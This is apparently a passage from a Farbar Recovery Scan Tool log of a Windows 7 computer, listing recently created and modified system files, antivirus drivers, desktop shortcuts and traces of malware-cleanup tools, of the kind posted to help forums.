                2017-04-12 14:42 - 2017-03-08 00:22 - 00261120 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00172032 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00171008 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00644096 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-07 23:58 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
                2017-04-12 14:42 - 2017-03-07 23:58 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
                2017-04-12 14:42 - 2017-03-07 23:58 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
                2017-04-12 14:42 - 2017-03-07 23:58 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
                2017-04-12 14:42 - 2017-03-07 23:57 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
                2017-04-12 14:42 - 2017-03-07 23:56 - 00271360 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
                2017-04-12 14:42 - 2017-03-07 23:55 - 00262656 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
                2017-04-12 14:42 - 2017-03-07 23:54 - 00226304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
                2017-04-12 14:42 - 2017-03-07 23:54 - 00124416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
                2017-04-12 14:42 - 2017-03-07 23:54 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
                2017-04-12 14:42 - 2017-03-07 23:53 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
                2017-04-12 14:42 - 2017-03-07 23:53 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
                2017-04-12 14:42 - 2017-03-07 23:53 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
                2017-04-12 14:42 - 2017-03-07 23:53 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
                2017-04-12 14:42 - 2017-03-07 23:53 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-07 23:53 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-07 23:53 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-07 23:53 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
                2017-04-12 14:42 - 2017-03-07 12:17 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
                2017-04-12 14:42 - 2017-03-03 21:14 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
                2017-04-12 14:42 - 2017-03-03 21:14 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\mfmjpegdec.dll
                2017-04-12 14:42 - 2017-02-14 12:19 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
                2017-04-12 14:42 - 2017-02-11 12:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
                2017-04-12 14:42 - 2017-02-09 12:14 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
                2017-04-12 14:42 - 2017-02-09 12:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00922432 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00066400 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00022368 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
                2017-04-12 14:42 - 2017-01-18 11:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll
                2017-04-12 14:40 - 2017-04-12 14:40 - 00330256 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
                2017-04-12 10:14 - 2017-04-12 13:57 - 00000000 ____D C:\Users\hilton75
                2017-04-11 16:03 - 2017-04-13 12:34 - 00000000 ____D C:\FRST
                2017-04-10 14:33 - 2017-04-12 16:22 - 00000594 _____ C:\Users\hilton\Desktop\SFC -SCANNOW s.website
                2017-04-10 14:22 - 2017-04-10 14:22 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Remo
                2017-04-10 14:21 - 2017-04-10 16:17 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Remo Speed Optimizer2.0
                2017-04-10 14:21 - 2009-02-12 15:11 - 00022312 _____ (EldoS Corporation) C:\Windows\system32\Drivers\rsdrv.sys
                2017-04-07 15:30 - 2017-04-12 13:52 - 00000608 _____ C:\Users\hilton\Desktop\Snopes. (1).website
                2017-04-06 12:01 - 2017-04-12 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
                2017-04-06 12:01 - 2017-04-06 12:01 - 00000000 ____D C:\ProgramData\Malwarebytes
                2017-04-06 12:01 - 2017-04-06 12:01 - 00000000 ____D C:\Program Files\Malwarebytes
                2017-04-02 12:24 - 2017-04-02 16:17 - 00025188 _____ C:\AdsFix_02_04_2017_16_17_19.txt
                2017-04-02 12:17 - 2017-04-12 14:26 - 00000000 ____D C:\AdsFix
                2017-04-01 15:23 - 2017-04-01 15:23 - 00000227 _____ C:\Users\hilton\Desktop\The ASA Monitor - Home Page.URL
                2017-03-30 12:37 - 2017-03-30 12:37 - 00519075 _____ C:\Users\hilton\Documents\NorthCarolina2014.pdf
                2017-03-30 12:29 - 2017-03-30 12:29 - 00230674 ____R C:\QuickDiag_30_03_2017_12_29_51.txt
                2017-03-30 12:06 - 2017-04-12 14:25 - 00000000 ____D C:\QuickDiag
                2017-03-20 00:48 - 2017-03-20 00:48 - 00028352 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
                2017-03-20 00:48 - 2017-03-20 00:48 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcr110_clr0400.dll
                2017-03-20 00:48 - 2017-03-20 00:48 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcr100_clr0400.dll
                2017-03-20 00:48 - 2017-03-20 00:48 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcp110_clr0400.dll
                2017-03-19 13:44 - 2017-03-19 13:44 - 00832275 _____ C:\Users\hilton\Downloads\HealthSummary20170319.zip
                2017-03-19 10:48 - 2017-03-19 10:48 - 09274608 _____ (Piriform Ltd) C:\Users\hilton\Downloads\ccsetup528(1).exe
                2017-03-14 15:23 - 2017-02-11 11:50 - 00313856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
                2017-03-14 15:23 - 2017-02-11 11:50 - 00311808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
                2017-03-14 15:23 - 2017-02-11 11:50 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
                2017-03-14 15:23 - 2017-02-10 12:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
                2017-03-14 15:23 - 2017-02-10 10:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
                2017-03-14 15:23 - 2017-02-10 10:33 - 00909824 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
                2017-03-14 15:23 - 2017-02-09 12:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
                2017-03-14 15:23 - 2017-02-09 12:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
                2017-03-14 15:23 - 2017-02-09 11:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
                2017-03-14 15:23 - 2017-02-06 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
                2017-03-14 15:23 - 2017-01-13 13:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
                2017-03-14 15:23 - 2017-01-13 13:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
                2017-03-14 15:23 - 2017-01-11 13:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
                2017-03-14 15:23 - 2017-01-11 13:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
                2017-03-14 13:11 - 2017-03-14 13:11 - 09274608 _____ (Piriform Ltd) C:\Users\hilton\Downloads\ccsetup528.exe

                ==================== One Month Modified files and folders ========

                (If an entry is included in the fixlist, the file/folder will be moved.)

                2017-04-13 12:34 - 2016-07-27 13:35 - 00000525 _____ C:\Users\hilton\Desktop\Yahoo Mail.website
                2017-04-13 12:27 - 2017-02-25 15:57 - 00000608 _____ C:\Users\hilton\Desktop\ Microsoft Community (1).website
                2017-04-13 11:36 - 2016-12-30 13:38 - 00000000 ____D C:\Program Files\Mozilla Firefox
                2017-04-13 11:12 - 2016-11-21 15:06 - 00000503 _____ C:\Users\hilton\Desktop\Hefs71’s Food Diary.website
                2017-04-13 11:00 - 2016-09-14 12:55 - 00000487 _____ C:\Users\hilton\Desktop\GMAIL.website
                2017-04-13 10:59 - 2016-06-29 19:08 - 00000617 _____ C:\Users\hilton\Desktop\outlook.website
                2017-04-13 10:49 - 2016-12-30 13:39 - 00000000 ____D C:\Users\hilton\AppData\LocalLow\Mozilla
                2017-04-13 10:49 - 2016-06-29 19:01 - 00000470 _____ C:\Users\hilton\Desktop\WELLS FARGO.website
                2017-04-13 10:46 - 2016-06-30 15:18 - 00000544 _____ C:\Users\hilton\Desktop\Fredericksbur.website
                2017-04-13 10:43 - 2016-06-30 15:19 - 00000565 _____ C:\Users\hilton\Desktop\N&O.website
                2017-04-13 10:31 - 2016-06-30 15:17 - 00000629 _____ C:\Users\hilton\Desktop\DRUDGE REPORT 2016®.website
                2017-04-13 04:19 - 2009-07-14 00:34 - 00021696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
                2017-04-13 04:19 - 2009-07-14 00:34 - 00021696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
                2017-04-12 19:43 - 2016-12-25 17:07 - 00002148 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
                2017-04-12 19:43 - 2016-12-25 17:07 - 00002136 _____ C:\Users\Public\Desktop\Google Chrome.lnk
                2017-04-12 19:43 - 2016-12-25 17:07 - 00002136 _____ C:\ProgramData\Desktop\Google Chrome.lnk
                2017-04-12 18:39 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\rescache
                2017-04-12 16:26 - 2016-07-05 15:22 - 00000494 _____ C:\Users\hilton\Desktop\Netflix.website
                2017-04-12 16:26 - 2016-07-02 14:57 - 00001224 _____ C:\Users\hilton\Desktop\sprint.website
                2017-04-12 16:25 - 2016-08-26 14:33 - 00000468 _____ C:\Users\hilton\Desktop\PC Help Forum.website
                2017-04-12 16:19 - 2016-07-13 12:29 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
                2017-04-12 16:11 - 2016-08-12 15:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RoboForm
                2017-04-12 16:09 - 2017-02-03 13:54 - 00000000 ____D C:\Users\hilton\AppData\Roaming\eM Client
                2017-04-12 16:08 - 2010-11-20 17:01 - 00781298 _____ C:\Windows\system32\PerfStringBackup.INI
                2017-04-12 16:08 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\inf
                2017-04-12 16:06 - 2016-11-06 15:03 - 00000450 _____ C:\Windows\Tasks\DriverUpdate Scan.job
                2017-04-12 16:03 - 2009-07-14 00:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
                2017-04-12 16:03 - 2009-07-14 00:33 - 00290256 _____ C:\Windows\system32\FNTCACHE.DAT
                2017-04-12 15:29 - 2016-07-03 03:09 - 00000000 ____D C:\Windows\system32\MRT
                2017-04-12 15:25 - 2016-07-09 17:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
                2017-04-12 15:25 - 2016-07-03 03:09 - 145733648 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
                2017-04-12 15:24 - 2016-07-09 17:12 - 00000000 ____D C:\Program Files\Microsoft Silverlight
                2017-04-12 15:18 - 2016-07-03 12:22 - 00065776 _____ C:\Windows\system32\GDIPFONTCACHEV1.DAT
                2017-04-12 14:42 - 2016-07-04 15:23 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
                2017-04-12 14:42 - 2016-07-04 15:23 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
                2017-04-12 14:42 - 2016-07-04 15:23 - 00000000 ____D C:\Windows\system32\Macromed
                2017-04-12 14:40 - 2016-12-18 22:20 - 00472760 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
                2017-04-12 14:40 - 2016-12-18 22:20 - 00279800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
                2017-04-12 14:40 - 2016-12-18 22:20 - 00118800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
                2017-04-12 14:40 - 2016-12-18 22:20 - 00106904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
                2017-04-12 14:40 - 2016-12-18 22:20 - 00090336 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
                2017-04-12 14:40 - 2016-12-18 22:20 - 00062152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
                2017-04-12 14:40 - 2016-12-18 22:20 - 00034136 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
                2017-04-12 14:40 - 2016-06-29 16:30 - 00000000 ____D C:\Users\hilton
                2017-04-12 14:39 - 2016-12-18 22:38 - 00388488 _____ (AVAST Software) C:\Windows\system32\Drivers\aswNetSec.sys
                2017-04-12 14:39 - 2016-12-18 22:22 - 00031064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
                2017-04-12 14:39 - 2016-12-18 22:20 - 00764064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
                2017-04-12 14:38 - 2017-03-12 08:27 - 00267528 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswblogx.sys
                2017-04-12 14:38 - 2017-03-12 08:27 - 00255184 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdriverx.sys
                2017-04-12 14:38 - 2017-03-12 08:27 - 00148208 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidshx.sys
                2017-04-12 14:38 - 2017-03-12 08:27 - 00041176 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbunivx.sys
                2017-04-12 14:34 - 2017-01-03 12:16 - 00000000 _____ C:\Windows\system32\last.dump
                2017-04-12 14:30 - 2017-01-20 14:40 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.3
                2017-04-12 14:28 - 2017-03-13 15:54 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kodi
                2017-04-12 14:28 - 2017-02-12 15:08 - 00000000 ____D C:\Windows\WindowsMobile
                2017-04-12 14:28 - 2017-02-07 16:45 - 00000000 ____D C:\Users\hilton\Downloads\x64
                2017-04-12 14:28 - 2017-02-07 16:45 - 00000000 ____D C:\Users\hilton\Downloads\HECI
                2017-04-12 14:28 - 2017-02-07 16:29 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
                2017-04-12 14:28 - 2017-01-28 15:13 - 00000000 ___HD C:\Windows\system32\CanonIJ Uninstaller Information
                2017-04-12 14:28 - 2017-01-20 14:48 - 00000000 ____D C:\Users\hilton\Documents\OpenOffice 4.1.3 (en-US) Installation Files
                2017-04-12 14:28 - 2016-09-05 14:21 - 00000000 __RSD C:\Users\hilton\Documents\McAfee Vaults
                2017-04-12 14:28 - 2016-09-05 14:04 - 00000000 ____D C:\Users\hilton\AppData\Roaming\McAfee
                2017-04-12 14:28 - 2016-08-01 13:59 - 00000000 ____D C:\Users\Public\Documents\Downloaded Installers
                2017-04-12 14:28 - 2016-08-01 13:59 - 00000000 ____D C:\ProgramData\Documents\Downloaded Installers
                2017-04-12 14:28 - 2016-07-15 13:40 - 00000000 ____D C:\Users\hilton\AppData\Roaming\InstantSupport
                2017-04-12 14:28 - 2016-07-06 16:40 - 00000000 ____D C:\Users\hilton\Documents\OpenOffice 4.1.2 (en-US) Installation Files
                2017-04-12 14:28 - 2016-07-05 14:37 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Amazon Music
                2017-04-12 14:28 - 2016-07-02 15:44 - 00000000 ____D C:\Users\PCPitstopSVC
                2017-04-12 14:28 - 2016-07-02 15:23 - 00000000 ____D C:\Users\hilton\AppData\LocalLow\Adblock Plus for IE
                2017-04-12 14:28 - 2016-07-02 13:55 - 00000000 ____D C:\Windows\Minidump
                2017-04-12 14:28 - 2016-07-01 13:11 - 00000000 ____D C:\Users\hilton\AppData\Roaming\RoboForm
                2017-04-12 14:28 - 2016-06-30 18:39 - 00000000 ____D C:\Users\hilton\AppData\Local\Stardock
                2017-04-12 14:28 - 2016-06-30 18:38 - 00000000 ____D C:\Users\hilton\Downloads\Stardock
                2017-04-12 14:28 - 2012-07-23 20:44 - 00000000 ____D C:\Windows\OEM
                2017-04-12 14:28 - 2012-07-23 20:44 - 00000000 ____D C:\Windows\ConfigSetRoot
                2017-04-12 14:28 - 2012-07-23 19:52 - 00000000 ____D C:\Windows\system32\Lang
                2017-04-12 14:28 - 2009-07-14 00:52 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
                2017-04-12 14:28 - 2009-07-14 00:52 - 00000000 ____D C:\Program Files\Windows Sidebar
                2017-04-12 14:28 - 2009-07-14 00:34 - 00000000 ____D C:\Windows\Setup
                2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 __RHD C:\Users\Public\Libraries
                2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\system32\NDF
                2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\servicing
                2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\PolicyDefinitions
                2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\AppCompat
                2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Program Files\Common Files\System
                2017-04-12 14:27 - 2017-03-13 15:53 - 00000000 ____D C:\Program Files\Kodi
                2017-04-12 14:27 - 2017-03-13 15:39 - 00000000 ____D C:\Users\hilton\AppData\Local\FromDocToPDFTooltab
                2017-04-12 14:27 - 2017-02-03 13:52 - 00000000 ____D C:\Program Files\eM Client
                2017-04-12 14:27 - 2017-01-28 15:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
                2017-04-12 14:27 - 2017-01-28 15:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG3200 series
                2017-04-12 14:27 - 2016-12-30 13:38 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
                2017-04-12 14:27 - 2016-12-25 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stardock
                2017-04-12 14:27 - 2016-12-18 22:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
                2017-04-12 14:27 - 2016-12-06 18:45 - 00000000 ____D C:\Users\hilton\AppData\Local\76f7c66
                2017-04-12 14:27 - 2016-09-26 12:01 - 00000000 ____D C:\Users\hilton\AppData\Local\CrashRpt
                2017-04-12 14:27 - 2016-09-26 12:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate
                2017-04-12 14:27 - 2016-09-26 12:01 - 00000000 ____D C:\Program Files\SlimWare Utilities
                2017-04-12 14:27 - 2016-09-26 12:01 - 00000000 ____D C:\Program Files\DriverUpdate
                2017-04-12 14:27 - 2016-09-05 14:03 - 00000000 ____D C:\Program Files\McAfee
                2017-04-12 14:27 - 2016-08-21 14:25 - 00000000 ____D C:\Program Files\Microsoft Games
